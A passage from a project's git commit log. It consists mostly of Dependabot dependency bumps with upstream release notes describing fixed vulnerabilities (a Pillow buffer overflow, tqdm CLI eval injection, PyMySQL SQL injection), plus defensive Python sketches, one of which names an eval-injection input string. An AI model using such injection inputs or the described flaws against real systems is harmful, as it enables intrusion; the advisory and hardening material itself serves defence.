<li>Added RGB to I;16, I;16L and I;16B conversion <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7918">#7918</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Fix editable installation with custom build backend and
configuration options <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7658">#7658</a>
[<a href="https://github.com/nulano"><code>@​nulano</code></a>]</li>
<li>Fix putdata() for I;16N on big-endian <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7209">#7209</a>
[<a href="https://github.com/Yay295"><code>@​Yay295</code></a>]</li>
<li>Determine MPO size from markers, not EXIF data <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7884">#7884</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Improved conversion from RGB to RGBa, LA and La <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7888">#7888</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Support FITS images with GZIP_1 compression <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7894">#7894</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Use I;16 mode for 9-bit JPEG 2000 images <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7900">#7900</a>
[<a
href="https://github.com/scaramallion"><code>@​scaramallion</code></a>]</li>
<li>Raise ValueError if kmeans is negative <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7891">#7891</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Remove TIFF tag OSUBFILETYPE when saving using libtiff <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7893">#7893</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Raise ValueError for negative values when loading P1-P3 PPM images
<a
href="https://redirect.github.com/python-pillow/Pillow/issues/7882">#7882</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Added reading of JPEG2000 palettes <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7870">#7870</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Added alpha_quality argument when saving WebP images <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7872">#7872</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Fixed joined corners for ImageDraw rounded_rectangle() non-integer
dimensions <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7881">#7881</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Removed Python and NumPy pinning on Cygwin <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7880">#7880</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Update UnidentifiedImageError and <strong>version</strong> imports
<a
href="https://redirect.github.com/python-pillow/Pillow/issues/7644">#7644</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Stop reading EPS image at EOF marker <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7753">#7753</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>PSD layer co-ordinates may be negative <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7706">#7706</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Use subprocess with CREATE_NO_WINDOW flag in ImageShow WindowsViewer
<a
href="https://redirect.github.com/python-pillow/Pillow/issues/7791">#7791</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>When saving GIF frame that restores to background color, do not fill
identical pixels <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7788">#7788</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Fixed reading PNG iCCP compression method <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7823">#7823</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Allow writing IFDRational to UNDEFINED tag <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7840">#7840</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Fix logged tag name when loading Exif data <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7842">#7842</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Use maximum frame size in IHDR chunk when saving APNG images <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7821">#7821</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Prevent opening P TGA images without a palette <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7797">#7797</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Use palette when loading ICO images <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7798">#7798</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Use consistent arguments for load_read and load_seek <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7713">#7713</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Turn off nullability warnings for macOS SDK <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7827">#7827</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Fix shift-sign issue in Convert.c <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7838">#7838</a>
[<a href="https://github.com/r-barnes"><code>@​r-barnes</code></a>]</li>
<li>winbuild: Refactor dependency versions into constants <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7843">#7843</a>
[<a href="https://github.com/hugovk"><code>@​hugovk</code></a>]</li>
<li>Build macOS arm64 wheels natively <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7852">#7852</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Fixed typo <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7855">#7855</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Open 16-bit grayscale PNGs as I;16 <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7849">#7849</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Handle truncated chunks at the end of PNG images <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7709">#7709</a>
[<a href="https://github.com/lajiyuan"><code>@​lajiyuan</code></a>]</li>
<li>Match mask size to pasted image size in GifImagePlugin <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7779">#7779</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Changed SupportsGetMesh protocol to be public <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7841">#7841</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Release GIL while calling <code>WebPAnimDecoderGetNext</code> <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7782">#7782</a>
[<a
href="https://github.com/evanmiller"><code>@​evanmiller</code></a>]</li>
<li>Fixed reading FLI/FLC images with a prefix chunk <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7804">#7804</a>
[<a href="https://github.com/twolife"><code>@​twolife</code></a>]</li>
<li>Updated package name for Tidelift <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7810">#7810</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Removed unused code <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7744">#7744</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/python-pillow/Pillow/blob/main/CHANGES.rst">pillow's
changelog</a>.</em></p>
<blockquote>
<h2>10.3.0 (2024-04-01)</h2>
<ul>
<li>
<p>CVE-2024-28219: Use <code>strncpy</code> to avoid buffer overflow <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7928">#7928</a>
[radarhere, hugovk]</p>
</li>
<li>
<p>Deprecate <code>eval()</code>, replacing it with
<code>lambda_eval()</code> and <code>unsafe_eval()</code> <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7927">#7927</a>
[radarhere, hugovk]</p>
</li>
<li>
<p>Raise <code>ValueError</code> if seeking to greater than offset-sized
integer in TIFF <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7883">#7883</a>
[radarhere]</p>
</li>
<li>
<p>Add <code>--report</code> argument to <code>__main__.py</code> to
omit supported formats <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7818">#7818</a>
[nulano, radarhere, hugovk]</p>
</li>
<li>
<p>Added RGB to I;16, I;16L, I;16B and I;16N conversion <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7918">#7918</a>,
<a
href="https://redirect.github.com/python-pillow/Pillow/issues/7920">#7920</a>
[radarhere]</p>
</li>
<li>
<p>Fix editable installation with custom build backend and configuration
options <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7658">#7658</a>
[nulano, radarhere]</p>
</li>
<li>
<p>Fix putdata() for I;16N on big-endian <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7209">#7209</a>
[Yay295, hugovk, radarhere]</p>
</li>
<li>
<p>Determine MPO size from markers, not EXIF data <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7884">#7884</a>
[radarhere]</p>
</li>
<li>
<p>Improved conversion from RGB to RGBa, LA and La <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7888">#7888</a>
[radarhere]</p>
</li>
<li>
<p>Support FITS images with GZIP_1 compression <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7894">#7894</a>
[radarhere]</p>
</li>
<li>
<p>Use I;16 mode for 9-bit JPEG 2000 images <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7900">#7900</a>
[scaramallion, radarhere]</p>
</li>
<li>
<p>Raise ValueError if kmeans is negative <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7891">#7891</a>
[radarhere]</p>
</li>
<li>
<p>Remove TIFF tag OSUBFILETYPE when saving using libtiff <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7893">#7893</a>
[radarhere]</p>
</li>
<li>
<p>Raise ValueError for negative values when loading P1-P3 PPM images <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7882">#7882</a>
[radarhere]</p>
</li>
<li>
<p>Added reading of JPEG2000 palettes <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7870">#7870</a>
[radarhere]</p>
</li>
<li>
<p>Added alpha_quality argument when saving WebP images <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7872">#7872</a>
[radarhere]</p>
</li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="5c89d88eee"><code>5c89d88</code></a>
10.3.0 version bump</li>
<li><a
href="63cbfcfdea"><code>63cbfcf</code></a>
Update CHANGES.rst [ci skip]</li>
<li><a
href="2776126aa9"><code>2776126</code></a>
Merge pull request <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7928">#7928</a>
from python-pillow/lcms</li>
<li><a
href="aeb51cbb16"><code>aeb51cb</code></a>
Merge branch 'main' into lcms</li>
<li><a
href="5beb0b6664"><code>5beb0b6</code></a>
Update CHANGES.rst [ci skip]</li>
<li><a
href="cac6ffa7b3"><code>cac6ffa</code></a>
Merge pull request <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7927">#7927</a>
from python-pillow/imagemath</li>
<li><a
href="f5eeeacf75"><code>f5eeeac</code></a>
Name as 'options' in lambda_eval and unsafe_eval, but '_dict' in
deprecated eval</li>
<li><a
href="facf3af93d"><code>facf3af</code></a>
Added release notes</li>
<li><a
href="2a93aba5cf"><code>2a93aba</code></a>
Use strncpy to avoid buffer overflow</li>
<li><a
href="a670597bc3"><code>a670597</code></a>
Update CHANGES.rst [ci skip]</li>
<li>Additional commits viewable in <a
href="https://github.com/python-pillow/Pillow/compare/10.2.0...10.3.0">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=pillow&package-manager=pip&previous-version=10.2.0&new-version=10.3.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:07:28 +08:00
d69f4ec829 build(deps): bump certifi from 2024.2.2 to 2024.7.4 (#1680)
Bumps [certifi](https://github.com/certifi/python-certifi) from 2024.2.2
to 2024.7.4.
<details>
<summary>Commits</summary>
<ul>
<li><a
href="bd8153872e"><code>bd81538</code></a>
2024.07.04 (<a
href="https://redirect.github.com/certifi/python-certifi/issues/295">#295</a>)</li>
<li><a
href="06a2cbf21f"><code>06a2cbf</code></a>
Bump peter-evans/create-pull-request from 6.0.5 to 6.1.0 (<a
href="https://redirect.github.com/certifi/python-certifi/issues/294">#294</a>)</li>
<li><a
href="13bba02b72"><code>13bba02</code></a>
Bump actions/checkout from 4.1.6 to 4.1.7 (<a
href="https://redirect.github.com/certifi/python-certifi/issues/293">#293</a>)</li>
<li><a
href="e8abcd0e62"><code>e8abcd0</code></a>
Bump pypa/gh-action-pypi-publish from 1.8.14 to 1.9.0 (<a
href="https://redirect.github.com/certifi/python-certifi/issues/292">#292</a>)</li>
<li><a
href="124f4adf17"><code>124f4ad</code></a>
2024.06.02 (<a
href="https://redirect.github.com/certifi/python-certifi/issues/291">#291</a>)</li>
<li><a
href="c2196ce5d6"><code>c2196ce</code></a>
--- (<a
href="https://redirect.github.com/certifi/python-certifi/issues/290">#290</a>)</li>
<li><a
href="fefdeec758"><code>fefdeec</code></a>
Bump actions/checkout from 4.1.4 to 4.1.5 (<a
href="https://redirect.github.com/certifi/python-certifi/issues/289">#289</a>)</li>
<li><a
href="3c5fb1560b"><code>3c5fb15</code></a>
Bump actions/download-artifact from 4.1.6 to 4.1.7 (<a
href="https://redirect.github.com/certifi/python-certifi/issues/286">#286</a>)</li>
<li><a
href="4a9569a3eb"><code>4a9569a</code></a>
Bump actions/checkout from 4.1.2 to 4.1.4 (<a
href="https://redirect.github.com/certifi/python-certifi/issues/287">#287</a>)</li>
<li><a
href="1fc808626a"><code>1fc8086</code></a>
Bump peter-evans/create-pull-request from 6.0.4 to 6.0.5 (<a
href="https://redirect.github.com/certifi/python-certifi/issues/288">#288</a>)</li>
<li>Additional commits viewable in <a
href="https://github.com/certifi/python-certifi/compare/2024.02.02...2024.07.04">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=certifi&package-manager=pip&previous-version=2024.2.2&new-version=2024.7.4)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:06:03 +08:00
ef45526700 build(deps): bump tqdm from 4.66.2 to 4.66.3 (#1681)
Bumps [tqdm](https://github.com/tqdm/tqdm) from 4.66.2 to 4.66.3.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/tqdm/tqdm/releases">tqdm's
releases</a>.</em></p>
<blockquote>
<h2>tqdm v4.66.3 stable</h2>
<ul>
<li><code>cli</code>: <code>eval</code> safety (fixes CVE-2024-34062,
GHSA-g7vv-2v7x-gj9p)</li>
</ul>
</blockquote>
</details>
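
The release note only says "`cli`: `eval` safety". As a general illustration of that class of fix, and not a reproduction of tqdm's actual patch, the sketch below converts command-line string values with an explicit table of cast functions instead of passing them to `eval`. The names `CASTS`, `to_bool`, and `cast_option` are hypothetical.

```python
from typing import Callable, Dict


def to_bool(text: str) -> bool:
    """Accept a small, fixed set of spellings for booleans."""
    lowered = text.strip().lower()
    if lowered in ("true", "1", "yes"):
        return True
    if lowered in ("false", "0", "no"):
        return False
    raise ValueError(f"not a boolean: {text!r}")


# Explicit whitelist of conversions; nothing here executes user-supplied code.
CASTS: Dict[str, Callable[[str], object]] = {
    "int": int,
    "float": float,
    "bool": to_bool,
    "str": str,
}


def cast_option(value: str, type_name: str) -> object:
    """Convert a command-line string to the declared option type."""
    try:
        caster = CASTS[type_name]
    except KeyError:
        raise ValueError(f"unsupported option type: {type_name!r}") from None
    return caster(value)
```

With this approach a value such as `__import__('os').getcwd()` is either kept as a plain string or rejected with `ValueError`, depending on the declared type, and is never evaluated.
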
<details>
<summary>Commits</summary>
<ul>
<li><a
href="4e613f84ed"><code>4e613f8</code></a>
Merge pull request from GHSA-g7vv-2v7x-gj9p</li>
<li><a
href="b53348c730"><code>b53348c</code></a>
cli: eval safety</li>
<li>See full diff in <a
href="https://github.com/tqdm/tqdm/compare/v4.66.2...v4.66.3">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=tqdm&package-manager=pip&previous-version=4.66.2&new-version=4.66.3)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:05:38 +08:00
79034bd194 build(deps): bump pymysql from 1.1.0 to 1.1.1 (#1664)
Bumps [pymysql](https://github.com/PyMySQL/PyMySQL) from 1.1.0 to 1.1.1.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/PyMySQL/PyMySQL/releases">pymysql's
releases</a>.</em></p>
<blockquote>
<h2>v1.1.1</h2>
<blockquote>
<p>[!WARNING]
This release fixes a vulnerability (CVE-2024-36039).
All users are recommended to update to this version.</p>
<p>If you can not update soon, check the input value from untrusted
source has an expected type.
Only dict input from untrusted source can be an attack vector.</p>
</blockquote>
<h2>What's Changed</h2>
<ul>
<li>Prohibit dict parameter for <code>Cursor.execute()</code>. It didn't
produce valid SQL
and might cause SQL injection. (CVE-2024-36039)</li>
<li>Added ssl_key_password param by <a
href="https://github.com/svaskov"><code>@​svaskov</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1145">PyMySQL/PyMySQL#1145</a></li>
</ul>
<h2>Merged PRs</h2>
<ul>
<li>Add support for Python 3.12 by <a
href="https://github.com/hugovk"><code>@​hugovk</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1134">PyMySQL/PyMySQL#1134</a></li>
<li>chore(deps): update actions/checkout action to v4 by <a
href="https://github.com/renovate"><code>@​renovate</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1136">PyMySQL/PyMySQL#1136</a></li>
<li>Update codecov/codecov-action action to v4 by <a
href="https://github.com/renovate"><code>@​renovate</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1137">PyMySQL/PyMySQL#1137</a></li>
<li>ci: use codecov@v3 by <a
href="https://github.com/methane"><code>@​methane</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1142">PyMySQL/PyMySQL#1142</a></li>
<li>chore(deps): update dessant/lock-threads action to v5 by <a
href="https://github.com/renovate"><code>@​renovate</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1141">PyMySQL/PyMySQL#1141</a></li>
<li>doc: use rtd theme by <a
href="https://github.com/methane"><code>@​methane</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1143">PyMySQL/PyMySQL#1143</a></li>
<li>use Ruff as formatter by <a
href="https://github.com/methane"><code>@​methane</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1144">PyMySQL/PyMySQL#1144</a></li>
<li>chore(deps): update dependency sphinx-rtd-theme to v2 by <a
href="https://github.com/renovate"><code>@​renovate</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1147">PyMySQL/PyMySQL#1147</a></li>
<li>chore(deps): update actions/setup-python action to v5 by <a
href="https://github.com/renovate"><code>@​renovate</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1152">PyMySQL/PyMySQL#1152</a></li>
<li>chore(deps): update github/codeql-action action to v3 by <a
href="https://github.com/renovate"><code>@​renovate</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1154">PyMySQL/PyMySQL#1154</a></li>
<li>chore(deps): update codecov/codecov-action action to v4 by <a
href="https://github.com/renovate"><code>@​renovate</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1158">PyMySQL/PyMySQL#1158</a></li>
<li>Support error packet without sqlstate by <a
href="https://github.com/methane"><code>@​methane</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1160">PyMySQL/PyMySQL#1160</a></li>
<li>test json - mariadb without JSON type by <a
href="https://github.com/grooverdan"><code>@​grooverdan</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1165">PyMySQL/PyMySQL#1165</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a href="https://github.com/hugovk"><code>@​hugovk</code></a> made
their first contribution in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1134">PyMySQL/PyMySQL#1134</a></li>
<li><a href="https://github.com/svaskov"><code>@​svaskov</code></a> made
their first contribution in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1145">PyMySQL/PyMySQL#1145</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a
href="https://github.com/PyMySQL/PyMySQL/compare/v1.1.0...v1.1.1">https://github.com/PyMySQL/PyMySQL/compare/v1.1.0...v1.1.1</a></p>
</blockquote>
</details>
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/PyMySQL/PyMySQL/blob/main/CHANGELOG.md">pymysql's
changelog</a>.</em></p>
<blockquote>
<h2>v1.1.1</h2>
<p>Release date: 2024-05-21</p>
<blockquote>
<p>[!WARNING]
This release fixes a vulnerability (CVE-2024-36039).
All users are recommended to update to this version.</p>
<p>If you can not update soon, check the input value from
untrusted source has an expected type. Only dict input
from untrusted source can be an attack vector.</p>
</blockquote>
<ul>
<li>Prohibit dict parameter for <code>Cursor.execute()</code>. It didn't
produce valid SQL
and might cause SQL injection. (CVE-2024-36039)</li>
<li>Added ssl_key_password param. <a
href="https://redirect.github.com/PyMySQL/PyMySQL/issues/1145">#1145</a></li>
</ul>
</blockquote>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="2cab9ecc64"><code>2cab9ec</code></a>
v1.1.1</li>
<li><a
href="521e40050c"><code>521e400</code></a>
forbid dict parameter</li>
<li><a
href="7f032a699d"><code>7f032a6</code></a>
remove coveralls from requirements</li>
<li><a
href="69f6c7439b"><code>69f6c74</code></a>
ruff format</li>
<li><a
href="b4ed6884a1"><code>b4ed688</code></a>
test json - mariadb without JSON type (<a
href="https://redirect.github.com/PyMySQL/PyMySQL/issues/1165">#1165</a>)</li>
<li><a
href="bbd049f40d"><code>bbd049f</code></a>
Support error packet without sqlstate (<a
href="https://redirect.github.com/PyMySQL/PyMySQL/issues/1160">#1160</a>)</li>
<li><a
href="9694747ae6"><code>9694747</code></a>
pyupgrade</li>
<li><a
href="1f0b7856de"><code>1f0b785</code></a>
chore(deps): update codecov/codecov-action action to v4 (<a
href="https://redirect.github.com/PyMySQL/PyMySQL/issues/1158">#1158</a>)</li>
<li><a
href="1e28be81c2"><code>1e28be8</code></a>
chore(deps): update github/codeql-action action to v3 (<a
href="https://redirect.github.com/PyMySQL/PyMySQL/issues/1154">#1154</a>)</li>
<li><a
href="f13f054abc"><code>f13f054</code></a>
chore(deps): update actions/setup-python action to v5 (<a
href="https://redirect.github.com/PyMySQL/PyMySQL/issues/1152">#1152</a>)</li>
<li>Additional commits viewable in <a
href="https://github.com/PyMySQL/PyMySQL/compare/v1.1.0...v1.1.1">compare
view</a></li>
</ul>
</details>
<br />
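
The changelog's interim advice above (check that a value from an untrusted source has an expected type before it reaches `Cursor.execute()`) could be sketched as follows. This is a minimal illustration, not PyMySQL code: `require_scalar` and `ALLOWED_SCALARS` are hypothetical names, and the list of allowed types is an assumption to adapt to the application.

```python
from typing import Any

# Assumption: the application only expects simple scalar values from callers.
ALLOWED_SCALARS = (str, int, float, bytes, type(None))


def require_scalar(value: Any) -> Any:
    """Return value unchanged if it is a plain scalar, otherwise raise TypeError.

    Containers such as dict are rejected, since the changelog names dict input
    from an untrusted source as the attack vector.
    """
    if not isinstance(value, ALLOWED_SCALARS):
        raise TypeError(f"unexpected parameter type: {type(value).__name__}")
    return value


# Hypothetical usage: validate each untrusted value before building the
# parameter tuple that is later passed to Cursor.execute().
params = (require_scalar("alice"), require_scalar(42))
print(params)
```

Upgrading to 1.1.1 remains the actual fix; a guard like this only covers the period before the upgrade.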



Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:05:14 +08:00
60356b52c6 Feat stepfun (#1659)
### What problem does this PR solve?

#1661
#1660

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

Co-authored-by: lijianyong <lijianyong@stepfun.com>
2024-07-24 10:49:37 +08:00
80d703f9c2 fix: fetch the file list after uploading the file by @tanstack/react-query #1306 (#1654)
### What problem does this PR solve?
fix: fetch the file list after uploading the file by
@tanstack/react-query #1306

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-23 17:53:15 +08:00
022afbb39d fix: remove unused libraries #1306 (#1649)
### What problem does this PR solve?
fix: remove unused libraries  #1306


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-23 15:03:58 +08:00
792a1a9d91 add password reset function by extending the Flask command (#1632)
### What problem does this PR solve?
add password reset function by extending the Flask command. #1200 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-23 14:02:41 +08:00
d2b70e73dd fix redis no such key (#1647)
### What problem does this PR solve?
fix Redis no such key #1614

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

Signed-off-by: seaver <zhudan187@qq.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2024-07-23 14:00:31 +08:00
37b0829e28 refine readme, update updates (#1648)
### What problem does this PR solve?



### Type of change

- [x] Documentation Update

---------

Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
2024-07-23 13:59:20 +08:00
b4a281eca1 add support for NVIDIA llm (#1645)
### What problem does this PR solve?

add support for NVIDIA llm
### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-23 10:43:09 +08:00
95821f6fb6 fix bug of ragflowdocxpparser (#1642)
### What problem does this PR solve?

#1627

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-23 09:25:32 +08:00
bf2ea04d02 fix: fetch file list by react-query #1306 (#1640)
### What problem does this PR solve?

fix: fetch file list by react-query #1306 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-22 19:29:20 +08:00
ac7a0d4fbf Add ParsertType Audio (#1637)
### What problem does this PR solve?

#1514 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-22 19:17:30 +08:00
9f109adf28 Add information form (#1636)
### What problem does this PR solve?


### Type of change

- [x] Documentation Update

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-07-22 16:14:40 +08:00
cf12c3cc1f fix: reference file with 'docx' type can not open #844 (#1635)
### What problem does this PR solve?

fix: reference file with 'docx' type can not open #844

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-22 15:54:15 +08:00
29a7b7a040 Add sequence2txt model.py (#1633)
### What problem does this PR solve?

#1514 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-22 14:52:08 +08:00
eb42adc818 fix: the content in the chunk card will overflow #1628 (#1629)
### What problem does this PR solve?
fix: the content in the chunk card will overflow #1628
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-22 13:54:07 +08:00
a4d230f12b add docker-compose-gpu-CN.yml and docker-compose-gpu-CN-oc9.yml to support gpu (#1618)
### What problem does this PR solve?

add docker-compose-gpu-CN.yml and docker-compose-gpu-CN-oc9.yml to
support gpu
#1558 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-22 09:25:42 +08:00
9352a09c53 modify the encryption to first perform base64 encoding and then encrypt (#1621)
### What problem does this PR solve?

The encryption should first perform base64 encoding and then encrypt, to
maintain consistency with the frontend

#1620 
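
The ordering described above (base64-encode first, then encrypt) might look like the sketch below. The cipher is passed in as a callable because the PR text does not name one. `encode_then_encrypt` and the byte-reversing stand-in are hypothetical, and the final base64 step for transport is an assumption.

```python
import base64
from typing import Callable


def encode_then_encrypt(plaintext: str, encrypt: Callable[[bytes], bytes]) -> str:
    """Base64-encode the plaintext, encrypt the encoded bytes, return ASCII text."""
    encoded = base64.b64encode(plaintext.encode("utf-8"))  # step 1: base64
    ciphertext = encrypt(encoded)                          # step 2: encrypt
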